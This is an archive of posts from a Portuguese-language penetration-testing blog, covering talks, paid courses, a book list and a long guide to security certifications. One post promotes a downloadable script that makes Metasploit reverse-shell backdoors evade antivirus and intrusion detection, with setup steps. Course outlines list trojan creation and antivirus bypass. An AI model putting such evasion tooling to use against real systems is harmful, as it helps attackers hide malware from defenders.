Hack Proofing Labs - Pensando Fora da Caixa

Palestras no HackingDay

2012-01-31T09:41:00.002-02:00

Pessoas, já foram liberados os vídeos e slides das palestras apresentadas no Hacking Day sábado passado (28/01).

Abaixo seguem os links dos slides de minhas palestras e os videos das mesmas, que foram transmitidas ao vivo.

http://blog.corujadeti.com.br/wp-content/uploads/2012/01/rematerialdaspalestras.zip

Primeira parte

Segunda parte

Terceira parte

Vídeos das palestras do FISL-12

2012-01-30T11:02:00.001-02:00

Em junho do ano passado (2011) rolou o FISL 12 e participei de uma Lightning Talk e apresentei uma palestra sobre forense. Como a organização do evento liberou os vídeos, decidi compartilhar aqui no Blog.

Aproveitei para colocar também o link para quem quiser acessar todas as outras apresentações do FISL 12.

Grade das palestras:
http://fisl.org.br/12/papers_ng/public/fast_grid?event_id=1

Forense Computacional com Software Livre:
http://gibson.softwarelivre.org/static/2011/high/sala41b/sala41b-high-201106300856.ogv

D-Flash talks!!! - 5 minutos para tópicos emergentes no mercado de tecnologia:
http://gibson.softwarelivre.org/static/2011/high/sala41d/sala41d-high-201106291159.ogv

Evento Internacional - Just4Meeting 3.0 - Lisboa/Portugal

2012-01-30T10:35:00.000-02:00

Pessoal, gostaria de compartilhar com vocês o convite que recebi para palestrar em um evento internacional, o Just4Meeting 3.0 que ocorrerá em Julho de 2012 em Lisboa/Portugal.

O mais legal de tudo é que haverão mais três brasileiros palestrando no mesmo evento: Ewerson Guimarães (Crash do DCLabs), Alex Nunes (do Codebreakers), e Emanuel Rodrigues.

Link para saber mais sobre o evento: http://www.just4meeting.com/2012/

[ ]'s

Próximas palestras

2012-01-13T15:55:00.001-02:00

Aproveitando para informar, pessoal, nos próximos meses já tenho 4 palestras agendadas em diferentes evento. Caso surjam outros eventos, atualizarei esse post, mas até março só participarei desses eventos por enquanto :-)

Hacking Day - 28/01/2012 - em SP
Link para saber mais: http://blog.corujadeti.com.br/ingressos-a-venda-para-o-hacking-day/

VOLDay III - 24/03/2012 - em Niterói/RJ
Link para saber mais: http://www.volcon.org/volday3/

15º CNASI RJ - 26/03/2012 - em RJ
Link para saber mais: http://www.cnasi.com.br/rj/

Just4meeting 3.0 - 6, 7 e 8/07/2012 - em Lisboa/Portugal
Link para saber mais: http://www.just4meeting.com/2012/

Espero poder encontrar os Srs. em algum desses eventos. No HackingDay estou pensando em marcar uma cerveja pós-evento, mas ainda preciso convencer a galera hehehe. Será possivelmente no O'Malleys (Consolação), se alguém se animar, é só nos procurar no HackingDay.

Surge uma nova empresa de treinamentos - OYS Academy

2012-01-06T16:51:00.000-02:00

Caros,

Quero informar à todos o surgimento de uma nova empresa no mercado de treinamentos de TI no Rio de Janeiro, mas com atuação nacional, e em breve com atuação em Angola, Itália e Portugal.

A empresa chama-se OYS - Open Your Source - Academy e tem o seu site em www.oys.com.br

Em breve, no site, teremos a ementa, valores e calendários de todos os cursos apresentados no ano de 2012, tanto na modalidade presencial (diurno, noturno e final de semana), quanto na modalidade EaD.

O foco da empresa são os treinamentos em soluções de Software Livre, com maior ênfase em Segurança da Informação em geral. E teremos, além dos cursos, as formações, que são pacotes de cursos com uma sequência lógica, que permitirá ao aluno ter uma visão aprofundada de determinada área.

Temos como objetivo, oferecer um produto de melhor qualidade do que aqueles que estão no mercado atualmente, e com um valor de investimento mais acessível, abaixo do mercado explorado pelas empresas concorrentes.

Don't feed the troll

2011-12-20T14:11:00.003-02:00

Capítulo OWASP no Rio de Janeiro

2011-12-16T14:51:00.000-02:00

Caros, tenho a honra de compartilhar com vocês, a abertura do mais novo capítulo do OWASP no Brasil: o capítulo Rio de Janeiro.

Em breve teremos mais informações, bem como as datas e locais dos encontros do capítulo aqui na cidade do RJ. Tais informações, bem como o endereço da lista de discussão para quem tem interesse em participar efetivamente do capítulo, segue abaixo:

https://www.owasp.org/index.php/Rio_de_Janeiro

Quero convidá-los a participar desse grupo e contribuir para a divulgação dessa notícia, que certamente será um marco na cidade do Rio de Janeiro, tão carente de grupos de pesquisa e estudos na área de segurança da informação.

Abraço à todos!

Cogumelo Binário - 2º Edição - Call for papers!

2011-12-13T14:10:00.002-02:00

Cogumelo Binário - 2º Edição - Call for papers!
==============================================================

   Vamos que vamos! Aproveitando o embalo do lançamento da 1ª edição,

convocamos a todos a participarem da 2ª edição da Cogumelo Binário!

Assim como na primeira edição, mantemos o foco nos seguintes tópicos:

hacking em geral, crypto, unix, low-level, RE, tricks etc.

   Se você gosta de montar crackme/exploitme e quiser contribuir,

mande para fazermos um desafio entre o público que acompanha a e-zine!
   Dúvidas? Sugestões? Pra onde enviar o paper? Entre em contato!

   E assim como na primeira edição, divulgaremos o deadline para

envio de paper, bem como a data de lançamento da 2ª edição em um

momento oportuno! Fique ligado!

Vídeos de minhas palestras no Hack'n Rio

2011-12-12T23:19:00.000-02:00

Caros,

No dia 03 de dexembro de 2012, apresentei duas palestras no Hack'n Rio sobre assuntos correlatos à segurança. Como a organização do evento já disponibilzou os vídeos, decidi postar aqui os links dos vídeos de minhas duas palestras.

Seguem os links:

Forense Computacional com Software Livre:
Vídeo 1 - Vídeo 2 - Vídeo 3

How Stuff Works: Exploits:
Vídeo 1 - Vídeo 2

Espero que aproveitem e gostem...

Abraço!

Curso Teste de Invasão em Redes - EaD

2011-12-12T10:24:00.002-02:00

De 13/02 à 15/03 de 2012

Curso de Teste de Invasão em Redes - EaD, com conteúdo completamente prático em ambiente interativo, com acesso à tela do instrutor e download de todo o material de aula (vídeos de cada aula gravada, áudio em separado para ouvir onde quiser, apostila completa e logs do chat onde as dúvidas são respondidas e os comando digitados).

Os alunos, além de montarem seus laboratórios com máquinas virtuais (com S.Os. atuais), terão exemplos reais de redes e aplicações vulneráveis, encontrados na web durante a aula.

Todo o curso será baseado na distribuição Backtrack, com ferramentas livres e gratuitas!

O instrutor do curso possui anos de experiência em testes de invasão, tanto em redes, quanto aplicações web, redes wireless e review code. E é uma oportunidade de aprender com quem convive com as necessidades e situações reais do mercado atual, com clientes de grande porte como multinacionais de diversas áreas (Petróleo e Gás, Telecomunicações, Transportes, Operadoras de Cartão de Crédito, Bancos, Instituições Militares e Órgãos Públicos).

Promoção

Ao inscrever-se no curso de Teste de Invasão em Redes, o aluno ganhará acesso aos vídeos das aulas do curso de Pentest com Metasploit Framwork.

E para os alunos do curso de Pentest com Metasploit Framework, haverá um desconto de 50% na inscrição do curso de Teste de Invasão em Redes, basta enaviar-me um e-mail informando-me que fez parte da turma de Metasploit.

Alguns dos tópicos abordados no curso são:

Introdução a segurança da Informação
Introdução ao Teste de Invasão e Ética Hacker
Escrita de Relatórios
Arte da busca: Google Hacking
Levantamento de informações e relacionamentos
Varreduras ativas, passivas e furtivas de rede
Enumeração de informações e serviços
Testando o Sistema
Ignorando Proteções
Técnicas de Força Bruta e como definir boas políticas de senha
Vulnerabilidades em aplicações web
Técnicas de Sniffing
Ataques a Servidores WEB
Ataques a Redes Wireless
Metasploit

Quem tiver interesse no curso, por favor, acesse o link http://migre.me/5nagH e faça sua inscrição no curso "Teste de Invasão em Redes" que em breve enviarei um e-mail para o pgto via PagSeguro.

Carga horária: 32h
Investimento: R$ 990,00 (com possibilidade de parcelamento em até 12x no cartão de crédito)
Horário de aula: 21h às 23h
Dias de aula: seg., ter., qua. e qui.
Início das aulas: 13/02/2012 (com intervalo na semana do carnaval)

Observação 1: após inscrever-se e receber o link de pgto via pagseguro, o aluno terá uma semana para realizar o pagamento. Após esse período, caso o pagamento não tenha sido realizado, sua inscrição será cancelada.

Observação 2: para inscrições após o dia 25/01/2012, o valor do curso muda para R$ 1.090,00.

Artigo sobre XSS

2011-12-11T18:47:00.000-02:00

Caros, tenho um artigo escrito em 2008 que até hoje ainda é atual e utilizamos essas técnicas para ataques e testes de invasão em aplicações web. É um artigo básico e introdutório, e por isso mesmo recomendado para quem quer entender um pouco mais sobre XSS.

Aí vem aquela pergunta: mas Luiz, prq não posta no seu blog? Simplesmente porque o blogspot é vulnerável à XSS ;-) e desde 2008 tento publicar aqui e o código postado é executado. E como não quero quebrar a integridade dos código utilizados, preferi postar apenas o link para o acesso ao mesmo, já que o publiquei em outro site em 2008.

Para quem tiver interesse, basta clicar aqui para acessar o artigo.

Espero que gostem e sirva como base para estudar outros ataques e vulnerabilidades.

Aproveitando: quem já fez curso de pentest comigo deve lembrar-se que uso meu próprio blog como alvo de ataque XSS para mostrar como funciona a vulnerabilidade hehehe.

Abraço!

Gerador de backdoor indetectável

2011-12-11T18:23:00.001-02:00

O pessoal do Security Labs desenvolveu um script bem interessante pronto para rodar no Backtrack.

O mais interessante, é que as técnicas de evasão aplicadas por tal script, funcionam não apenas em antivírus, mas também em Firewalls e Sistemas de Detecção de Intrusão (IDS).

É interessante dar uma olhada para ver quantos antivírus o script conseguiu burlar: http://virusscan.jotti.org/en/scanresult/a974be8a357cf4f13df8e94ca89ee4ecb89fb1da

Para compilar e gerar o payload malicioso e aplicar o script para torná-lo indectável, é necessário ter alguns pacotes instalados previamente. Para tanto, basta executar o seguinte comando:

# apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

Com os pacotes instalados, precisamo copiar o script baixado para o diretório do Metasploit e executá-lo (/pentest/exploits/framework).

O que é preciso prestar atenção, é que esse script por padrão gera um payload de conexão reversa via TCP, mas isso pode ser alterado editando o script e alterando algumas opções. Para quem já conhece o funcionamento do MSFpayload isso é bem tranquilo ;-)

Para baixar o script, basta clicar aqui.

Slides da palestra no Hack'n Rio: How Stuff Works - Exploits

2011-12-04T11:27:00.001-02:00

How stuff works

View more presentations from Luiz Vieira.

Slides da palestra Auditoria em Sistemas Linux - LinuxCon

2011-11-20T07:31:00.001-02:00

Auditoria em sistemas linux - LinuxCon Brazil 2011

View more presentations from luizvieira

Slides da palestra Teste de Invasão com Ferramentas Livres - LinuxCon

2011-11-20T07:26:00.000-02:00

Curso de Pentest com Metasploit Framework - EaD

2011-11-01T20:18:00.000-02:00

Caros,

Gostaria de anunciar o curso "Pentest com Metasploit Framework", na modalidade EaD.

O curso ocorrerá na seguintes datas (sextas-feiras), das 21h à 00h, através da modaliade EaD:

09/12
16/12
13/01
20/01
27/01
03/02
10/02

O aluno terá contato direto com o instrutor através de uma plataforma de conferência on-line, com slides, voz, e desktop sharing.

O valor do curso é de R$ 690,00,00 e a carga horária é de 21h completamente hands-on.

Segue abaixo o cronograma do curso:

Metasploit Basics
    Terminologia
    Interfaces
    Utilitários

Aquisição de Informações
    Trabalhando com BDs
    Varreduras Diversas

Vulnerabilidades
    Metasploit + Nessus
    Varreduras Especiais
    Usando o Autopwn

Exploração
    Exploração Básica
    Brute Force
    Automatizando comandos (resource files)

Meterpreter
    Comandos Básicos
    Extraindo logins e passwords
    Escalada de Privilégios
    Pivoting
    Scripts do Meterpreter
    Fazendo upgrade do shell obtido
    Railgun

Burlando Sistemas de Detecção
    Criando binários maliciosos com MSFpayload
    Burlando Anti-vírus
    Utilizando padrões conhecidos
    Criando Trojans
    Empacotando com UPX

Client-Side Attacks
    Exploits baseados em Browsers
    Exploits em arquivos

Módulos Auxiliares
    Utilizando os módulos
    Entendendo o funcionamento dos módulos auxiliares

SET: Social Engineer Toolkit
    Configurando o SET
    Ataque Spear-Phishing
    Ataques com vetor na WEB
    Infectious Media Generator

Fast-track
    Automatizando ataques de SQL Injection
    Binary-to-Hex Generator
    Ataques em massa

Karmetasploit
    Configuração
    Execução de um ataque
    Conquistando uma shell

O pagamento será feito via pagseguro e poderá ser parcelado no cartão de crédito.

Quem tiver interesse no curso, por favor, acesse o link http://migre.me/5nagH e faça sua inscrição no curso "Pentest com Metasploit Framework" que em breve enviarei um e-mail para o pgto via PagSeguro.

Pré-requisitos:
- experiência em utilização e instalação de programas em Linux;
- conhecimento em segurança da informação;
- conhecimento dos conceitos básicos do que é um teste de invasão e sua realização;

Material liberado para os alunos:
- log do chat de cada aula;
- áudio de cada aula;
- vídeo de cada aula, com a tela do instrutor gravada;

Mais uma lista de livros para segurança

2011-10-23T09:03:00.002-02:00

Caros, segue abaixo mais uma lista de livros de segurança que classifico como muito importantes para quem se interessa por segurança, sei que alguns se repetirão, se comparado à minha última listagem, mas nunca é demais frisar que alguns livros são tão importantes a ponto de serem citados novamente hehehe.
Essa lista, foi compilada a partir de indicações de profissionais e pesquisadores como Dino Dai Zovi e Thomas Ptacek.

Hacking: The Art of Exploitation, 2nd Edition by Jon Erickson

The Art of Software Security Testing: Identifying Software Security Flaws by Elfriede Dustin

The Mac Hacker's Handbook by Dino Dai Zovi

C Programming Language (2nd Edition) by Brian W. Kernighan

Expert C Programming by Peter van der Linden

Fuzzing: Brute Force Vulnerability Discovery by Michael Sutton

Fuzzing for Software Security Testing and Quality Assurance (Artech House Information Security and Privacy) by Ari Takanen

The Art of Software Security Assessment: Identifying and Preventing Software Vulnerabilities by Mark Dowd

The Art of Assembly Language by Randall Hyde

The IDA Pro Book: The Unofficial Guide to the World's Most Popular Disassembler by Chris Eagle

Reversing: Secrets of Reverse Engineering by Eldad Eilam

Exploiting Software: How to Break Code by Gary McGraw

The Shellcoder's Handbook: Discovering and Exploiting Security Holes by Chris Anley

Rootkits: Subverting the Windows Kernel by Greg Hoglund

Gray Hat Python: Python Programming for Hackers and Reverse Engineers by Justin Seitz

The Web Application Hacker's Handbook: Discovering and Exploiting Security Flaws by Dafydd Stuttard

Cryptography Engineering: Design Principles and Practical Applications by Bruce Schneier

The Practice of Programming by Brian W. Kernighan

C Interfaces and Implementations: Techniques for Creating Reusable Software by David R. Hanson

Surreptitious Software: Obfuscation, Watermarking, and Tamperproofing for Software Protection by Christian Collberg

A maioria, se não todos, podem ser encontrados para consulta e download na internet. Mas concordo que, se o livro realmente é bom, e você gostou dele, comprá-lo é um incentivo para o autor continuar escrevendo bons livros e a editora investir mais ainda nesse tipo de literatura.

Aproveitem!

Agenda de palestras - 4º trimestre de 2011

2011-10-17T23:44:00.000-02:00

Galera, tenho algumas palestras agendadas em eventos diversos nas próximas semanas e meses. Quero aproveitar e disponibilizar aqui no blog as datas de algumas dessas palestras (até mesmo para eu não esquecer hehehe):

CNASI - SP: Mini-curso Forense Computacional com Software Livre - 19/10/2011

LinuxCon Brasil 2011 - SP: "Auditoria em Sistemas Linux" e "Ferramentas Livres para Teste de Invasão" - 17 e 18/11/2011

LinuxDay - Juiz de Fora: "Ferramentas Livres para Teste de Invasão" - 26/11/2011

Hack'n Rio - RJ: "How Stuff Works: Exploits" e "Forense Computacional com Software Livre" - 03/12/2011

Espero encontrá-los em algum desses eventos!

[ ]'s

Certificações em Segurança: para qual estudar?

2011-10-16T10:12:00.001-02:00

* esse artigo também foi publicado na edição de nº30 da Revista Espírito Livre

Oque mais vejo em listas de discussão da área de segurança, e ouçode meu alunos e pessoas que assistem minhas palestras é a seguintepergunta: qual é a melhor certificação na área de segurança dainformação?

Háoutras variantes sobre o mesmo tema, mas é sempre alguém querendosaber qual é a melhor certificação para se obter tanto para quemestá entrando nessa área, quanto para quem quer crescer ainda mais.

Porconta de tantas dúvidas sobre o mesmo assunto, ainda mais na áreade S.I., pensei em escrever esse artigo para clarear um pouco mais aquestão.

Primeirovou tentar elencar as certificações mais importantes para o mercadonesse momento, tanto para quem pensa em enfrentar o mercadotupiniquim, quanto para quem pensar em buscar outras oportunidades aoredor do mundo. Afinal, certificação reconhecida apenasnacionalmente, em plena era da globalização, é pura perda detempo.

Amaioria das certificações que procurarei abordar, são vendorneutral, mas algumas fugirão dessa regra, por mais que eu meesforce.

Umexemplo disso, são as certificações da CISCO. Por mais quequeiramos fugir, a CISCO ainda detém uma imensa fatia do mercado deequipamentos de redes e infraestrutura. E esse fabricante, por sabero quanto a segurança de uma infraestrutura é importante para umaorganização, desenvolveu um currículo bem interessante para osprofissionais que já trabalham com CISCO e possuem pelo menos oCCNA. Partindo dessa certificação básica desse vendor, oprofissional pode decidir por especializar-se em segurança deinfraestrutura de redes, seguindo o padrão CISCO com ascertificações CCNA Security, CCNP Security e CCIE Security.

Essascertificações, são bem interessantes quando pensamos noprofissional que atua como analista de infraestrutura e deseja migrarpara a área de segurança. Mas e para o profissional que administraredes? As certificações LPI, voltadas para Linux são muito boas,principalmente quando culminam na LPI 303, cujo foco é segurança emservidores Linux.

ALPI 303, aborda temas que possibilitam o profissional que atua comLinux, realizar o hardening e proteger seus servidores de acessosindevidos e ataques remotos e locais. Os temas abordados englobamdesde criptografia de disco, à VPN e monitoramento com Nagios.

Eucostumo inclusive brincar, que se alguma empresa quer um profissionalcom conhecimento de infra e administração de redes, é só ver se oprofissional tem o conhecimento prático e vivencial que é pedidopara uma certificação LPI e CISCO conjugadas. Mas vamos em frente,pois o nosso foco aqui é segurança... E só falamos de quatrocertificações até agora.

Quandoalguém me pergunta qual a melhor certificação para conseguirentrar no mercado de SI, prontamente digo: ISO 27002. Essa é bembásica, fácil de tirar e precisa constar no currículo de todoprofissional de segurança da informação. Mas deve-se ficar bemclaro, que junto dessa certificação, o profissional deve ter umconhecimento extenso sobre a norma ISO 27001, para saber o porque demuita coisa da 27002. Mas ainda assim, essas certificações aindasão para níveis de gestão e consultoria apenas, sem conhecimentotécnico muito forte como pré-requisito.

Outracertificação para quem já tem um pé em segurança, atuando comalguns controles como administrador de redes ou analista de infra(onde em muitas empresas é esse o profissional que faz tudo), é aSecurity+ da CompTIA, que aborda diversos temas sobre segurança eprecisa da comprovação de dois anos de atuação na área.Considero essa certificação como um nível intermediário,preparatório para outras mais complexas.

Continuandoainda no nível de gestão, temos a CISM (Certified InformationSecurity Manager) criada pela ISACA, que tem como foco osprofissionais que atuarão como gerentes de SI, tomando as decisõesmais burocráticas e de nível de gestão que envolvem a segurançanuma organização.

DaISACA também, com um bom nível de importância no mercado, temos aCISA (Certified Information Systems Auditor), possui um foco emauditoria, controles e segurança. Se o profissional pretende seguiro rumo da auditoria em TI e SI em geral, essa é uma certificaçãoobrigatória.

Partindoagora para uma outra empresa certificadora, onde se encontramatualmente as certificações mais requisitadas pelo mercado desegurança, a (ISC)², cito três certificações como as maisinteressantes para os profissionais que já atuam na área, masprecisam de um respaldo maior para ascenderem em suas carreiras:SSCP, CSSLP e CISSP.

Aprimeira dessas certificações, SSCP (Systems Security CertifiedPractitioner), tem como foco profissionais que atuem como analistasde segurança, administradores de rede e sistemas. A prova englobaparte dos domínios existentes no CBK (Common Body Knowledge), e quetambém fazem parte dos domínios cobrados na prova para a CISSP. Éinteressante para os profissionais que estão iniciando em segurança,que não se sentem seguros para realizar a prova para CISSP já deinício, mas querem uma certificação respeitada internacionalmentena área.

Jáa CSSLP, CertifiedSecure Software Lifecycle Professional, é uma das primeirascertificações no mundo a abordar o tema desenvolvimento seguro. Nãohá foco na codificação, ou limitação no que diz respeito àslinguagens que suporta, pois é mais global, focando em todo o ciclode produção de um software e validando em cada ponto, os princípiosde segurança existentes.

Hápouquíssimos profissionais dessa área no mercado atualmente, e éuma excelente oportunidade para quem trabalha com desenvolvimento equer migrar para segurança da informação, pois permitirá coadunarsua experiência prévia, com os novos conceitos aprendidos sobresegurança, e de uma maneira que está de acordo com as necessidadesatuais do mercado.

Agora,chegamos na certificação mais importante para o mercado desegurança, a CISSP. Devemos manter em mente, que ela não é umacertificação técnica e nem tem esse objetivo. No entanto, elarequer um conhecimento bem amplo quanto as soluções existentes nosdiversos domínios do CBK desenvolvido pela (ISC)². Tais domíniosabordados na prova são:

Access Control
Application Development Security
Business Continuity and Disaster Recovery Planning
Cryptography
Information Security Governance and Risk Management
Legal, Regulations, Investigations and Compliance
Operations Security
Physical (Environmental) Security
Security Architecture and Design
Telecommunications and Network Security

Aprova, até ano passado, era aplicada apenas em papel, e em inglês.No entanto, do final do ano passado pra cá, tivemos ótimasnotícias, inclusive uma que deixou à todos felizes esse mês(setembro/2011): as provas desde o final do ano passado já sãoaplicadas em português, e partir de outubro de 2011, elas tambémpoderão ser realizadas em alguns centros credenciados pela VUE ePrometric.

Essasduas decisões são importantes para, em primeiro lugar, focar aavaliação nos domínios, e não no nível de proficiência que oprofissional tem da língua inglesa. E em segundo, porque anteshaviam poucas vagas nas poucas vezes em que a prova era aplicada aquino Brasil, inclusive forçando que os profissionais se deslocassempara São Paulo, gastando com deslocamento e hospedagem para realizara prova, e ainda assim corriam o risco de não conseguir vagas para aprova, já que sempre eram poucas. E uma das coisas interessantes, éque antes era necessário aguardar algumas semanas, e agora com aprova no formato eletrônico, o resultado sai assim que o candidatofinaliza a prova.

Agora,quem quiser realizar essa prova, prepare-se para a maratona, pois sãoem média 250 perguntas, mas sem uma solução muito definida do tipo“qual a flag de resposta quando é enviado uma pacote com a flagnull ativa para uma porta aberta?”. Na prova da CISSP, as questõessão sempre contextualizadas, cobrando uma solução que melhor seencaixe naquele cenário específico. Por isso, alguns anos deexperiência na área de segurança, além de ser um dospré-requisitos para obter a certificação, também auxiliará oprofissional à responder as questões de forma mais concisa ecoerente.

Essacertificação, CISSP, é pré-requisito para quem quer sair doBrasil e conseguir uma vaga lá fora na área de segurança dainformação. E aqui no Brasil, como ainda são poucos osprofissionais com esse certificado, ainda é possível conseguir bonssalários comparados com outras áreas de atuação em nosso país(faixa salarial de 10.000,00 à 20.000,00 dependendo do nível degestão em que o profissional atue).

Paraquem quiser saber um puco mais sobre os domínios abordados nasprovas das certificações da (ISC)², é interessante acessar oseguinte link:

https://www.isc2.org/previews/Default.aspx

Agoravamos partir para certificações mais técnicas, e analisar algumasdas oferecidas pela SANS, EC-Council, ISECOM, Offensive Security eImmunity.

ASANS, através da entidade certificadora conhecida como GIAC (GlobalInformation Assurance Certification), oferece dezenas decertificações para a área de segurança da informação. Vou falarapenas de algumas delas.

Ascertificações oferecidas pela SANS são altamente reconhecidas nomercado internacional, mas ainda estão em processo de valorizaçãoaqui no Brasil. Portanto, se quer uma certificação conceituada etem como objetivo sair do Brasil ou atuar em uma multinacional, ascertificações GIAC são uma excelente pedida.

Elassão agrupadas em categorias, que são as seguintes, atualmente:

Security Administration
Audit
Management
Operations
Software Security and/or Secure Coding
Forensics
Legal
Expert

Entreessas categorias, podemos contar com dezenas de certificações, asquais destaco a seguir, como sendo as mais interessantes na partetécnica referente à segurança, de acordo com a área de atuaçãodesejada pelo profissional.

Paraquem atua ou quer atuar com resposta à incidentes:

GCIA - GIAC Certified Intrusion Analyst
GCIH - GIAC Certified Incident Handler

Paraquem deseja atuar com teste de invasão e avaliações de segurança:

GPEN - GIAC Penetration Tester
GWAPT - GIAC Certified Web Application Penetration Tester
GAWN - GIAC Assessing Wireless Networks

Paraquem deseja atuar com forense computacional e análise de malware:

GCFE - GIAC Certified Forensic Examiner
GCFA - GIAC Certified Forensic Analyst
GREM - GIAC Certified Reverse Engineering Malware

Desde2005 surgiu uma controvérsia com relação às certificações daSANS, mas nada que comprometesse sua credibilidade no mercado. Essaorganização, decidiu facilitar o processo de obtenção de suascertificações criando dois níveis, o Silver e o Gold. Para tiraruma certificação no nível Silver, basta o profissional realizar asprovas de múltiplas escolhas necessárias para aquela áreaespecífica. No entanto, se o profissional quiser ser um certificadoGold, ele precisa finalizar o desafio prático apresentado, paracomprovar sua aquisição de conhecimento aplicado à situaçõespráticas.

AEc-Council, outra entidade que oferece certificações para a áreade segurança, também possui reconhecimento internacional, inclusivecom a chancela do Pentágono (órgão de defesa americano). Suascertificações tem ganhado um reconhecimento maior no mercadobrasileiro, e possuem um foco mais técnico do que gerencial.

Apesarda Ec-Council oferecer mais de uma dezena de certificações, vouabordar apenas quatro delas, com foco mais técnico e próximo dasnecessidades de um profissional de segurança. São elas: ECSA, CEH,LPT e CHFI.

Paraquem está iniciando em segurança, está bem cru mesmo e querentender o que um analista de segurança faz e quais suasatribuições, aconselho a certifica ECSA (Ec-Council SecurityAnalyst), que aborda os temas básicos da atuação com segurança dainformações e os controles de segurança que precisam serimplementados, para tornar uma infraestrutura mais segura. Agora, nãoesperem demais dessa certificação, pois ela é inicial eintrodutória no assunto de segurança, não sendo indicada paraprofissionais que já atuem na área e tenham experiência de algunsanos.

Paraquem quer algo um pouco mais aprofundado, a CEH (Certified Ethicalhacker) é mais interessante, pois já aborda a questão dasavaliações de segurança, como teste de invasão e auditoria desegurança em redes e sistemas. É reconhecida internacionalmente,mas na minha opinião peca por não ter uma avaliação prática, comdesafios do tipo “capture the flag”. Entretanto, ainda assim éuma certificação interessante que força o aluno a estudar bastanteos conceitos de segurança e testes.

Atualmente,reunindo a certificação ECSA e CEH, caso o profissional tenhaexperiência e atuação com testes de invasão, ele pode reunir asdocumentações comprobatórias necessárias de sua experiência, erequerer à Ec-Council a certificação LPT (Licensed PenetrationTester), que certifica o profissional como sendo um pentesterreconhecido por uma organização internacional, a Ec-Council.

Confessoque dessas certificações da Ec-Council, aqui no Brasil só vi emvagas de empregos, a solicitação da CEH e da CHFI, a próximaa ser comentada.

ACHFI (Certified Hacking Forensic Investigator), já possui um focobem específico, que é a forense computacional. É bem interessanteo conteúdo cobrado, desde que o profissional saiba como aplicá-lo,pois como todas as outras provas da Ec-Council, é tudo teórico commúltiplas escolhas. No entanto, o nível técnico dessa certificaçãoé superior aos das citadas anteriormente, pois pressupõe umconhecimento prévio do que é abordados nas três certificaçõesanteriores. Afinal, como um investigador poderá encontrar indíciosse não conhece como deve ser um ambiente seguro, como normalmenteele pode ser comprometido, e quais as ferramentas e métodosutilizados numa invasão? Logo, podemos assumir que a CHFI é umareunião dos conhecimentos necessários para as certificaçõesanteriores mais o conhecimento investigativo, necessário para arecriação de cenários complexos através da descobertas deindícios e evidências, em sistemas Windows, Linux, MAC, imagens,roteadores, redes, e etc.

Astrês organizações restantes, ISECOM, Offensive Security eImmunity, oferecem poucas certificações, mas nem por isso sãomenos importantes.

AISECOM é responsável pela manutenção e suporte à OSSTMM, umametodologia internacionalmente aceita como muito adequada para arealização de testes de invasão. O que é interessante é que essametodologia foi tão bem aceita no mercado, que estuda-se apossibilidade de transformá-la em uma norma ISO, específica para ostestes de segurança. Portanto, qualquer uma das duas certificaçõesdessa entidade, OPSA e OPST (OSSTMM Professional Security Analyst eOSSTMM Professional Security Tester), é interessante para quemquiser já estar preparado para essa mudança radical, tornando essametodologia um padrão adotado internacionalmente.

Aprimeira certificação OPSA, é mais voltada para analistas desegurança, administradores de rede com foco em segurança e CSO’s,que precisam ter um conhecimento mais aprofundado que a média sobreuma metodologia de testes de segurança, mas sem necessariamenteprecisar realizar esses testes ou avaliações de forma maisespecializada.

Jáa OPST, tem um foco mais aprofundado, na realização de testes desegurança, fazendo com que essa seja a escolha mais acertada para osprofissionais que atuem diretamente realizando essas avaliações einvestigações, tais como Pentesters e Investigadores Forense.

Agora,na área de segurança, apesar de ainda não ter o devidoreconhecimento do mercado aqui no Brasil, as certificações querealmente atestam se o profissional está pronto para atuar naprática com testes de invasão são: OSCP e OSCE. Sem desmerecer asdemais certificações, acredito que essas duas são as que mais seaproximam de um ambiente real encontrado por um profissional aorealizar um testes de invasão.

Ofoco de ambas as certificações, é comprovar na prática aaquisição dos conhecimentos transmitidos ao estudante ao longo doperíodo que o mesmo tem acesso ao LAB, fornecido pela OffensiveSecurity, organização mantenedora do Backtrack, distribuiçãosobre a qual toda a certificação é baseada.

Adiferença entre ambas certificações, OSCP (Offensive SecurityCertified Professional) e OSCE (Offensive Security Certified Expert),está no treinamento que é realizado e na prova que culminam essestreinamentos.

Paraa OSCP, o treinamento realizado é o PWB (Pentesting with Backtrack)com duração de 30, 60 ou 90 dias de acesso, depende de quanto oaluno quiser pagar pelo tempo de acesso ao LAB. A prova éexclusivamente prática, onde o aluno tem 24h corridas para realizara entrada na rede cedida para avaliação pela Offensive Security, ealcançar os objetivos propostos, de acordo com os conteúdosestudados e praticados no LAB.

Epara alcançar a OSCE, o aluno precisa inscrever-se no treinamentoCTP (Cracking the Perimeter), que funciona nos mesmos moldes do PWD,com acesso ao LAB por um determinado número de dias, acesso àapostila e vídeos com as técnicas explicadas detalhadamente, queculminarão numa avaliação bem mais avançada que a primeira: 48hcorridas para a realização das práticas com um relatório final detudo o que foi feito. Nesse nível, o aluno não apenas empregarátécnicas de exploração, mas analisará vulnerabilidades, como elaspoderão ser exploradas e precisará desenvolver seus própriosexploits para explorar as vulnerabilidades encontradas (um adendo: osexploits desenvolvidos precisam ser enviados ao final da avaliação).

Portanto,deve estar claro para vocês porque essas certificações ainda nãopossuem o devido reconhecimento no mercado de segurança, pois paradominar o processo de testes de invasão e testes de segurança nonível solicitado por essas certificações, o profissional precisater um nível técnico bem alto.

Acertificação que deixei para o final, não é a menos importante,mas sim a mais trabalhosa de se conquistar, pois demanda um níveltécnico razoavelmente alto para o que a certificação se propõe.

Essacertificação é a NOP (Network Offensive Professional), criada pelaImmunity Sec., desenvolvedora do Immunity Canvas e Immunity Debugger,importantes ferramentas para profissionais de segurança.

Emprimeiro lugar, a prova é de graça, e não se paga nada para tirara certificação, a não ser a passagem de avião os EUA (!!!). Apartir daí, na sede da Immunity, o postulando terá pouco mais de 30minutos para fazer o seguinte: receber dois PE's (executáveisWindows), com vulnerabilidades que deverão ser detectadas atravésdo processo de debugging e fuzzing, utilizando ferramentas da própriaImmunity, como é o caso de seu Debugger. Detectando asvulnerabilidades, é necessário dentro do prazo estipulado(lembre-se, pouco mais de 30 minutos no total), desenvolver umexploit, nada muito rebuscado, que faça a exploração dessavulnerabilidades e alcance um determinado resultado como definidopelos aplicadores da prova.

Atravésdessa pequena análise de algumas das certificações existentes,podemos perceber quantas possibilidade temos diante de nós. Aescolha de qual certificação é melhor, sempre vai depender da áreaonde o profissional deseja atuar, bem como a empresa onde játrabalha ou busca uma vaga.

